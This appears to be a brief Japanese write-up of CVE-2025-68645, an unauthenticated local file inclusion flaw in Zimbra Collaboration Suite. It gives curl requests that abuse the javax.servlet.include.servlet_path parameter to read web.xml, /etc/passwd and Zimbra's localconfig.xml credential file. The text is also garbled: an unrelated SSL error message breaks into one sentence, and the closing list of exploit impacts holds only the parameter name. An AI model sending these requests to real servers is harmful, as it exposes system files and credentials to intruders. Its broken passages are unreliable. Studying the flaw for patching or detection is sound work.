
CVE-2025-68645
このドキュメントでは、Zimbra Collaboration Suite に影響を及ぼす ローカルファイルインクルージョン (LFI) の脆弱性について説明します。
この問題は、以下のパラメータの不適切な処理に起因します。
/h/*?javax.servlet.include.servlet_path=
これにより、認証されていないユーザーが内部アプリケーションリソースにアクセスできるようになります。
テストリクエスト:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
複数のエンドポイントが脆弱なパラメータを異なる方法で処理します。
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/rest と比較して応答の信頼性が高いSSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
エクスプロイトが成功すると、以下の可能性があります:
javax.servlet.include.servlet_path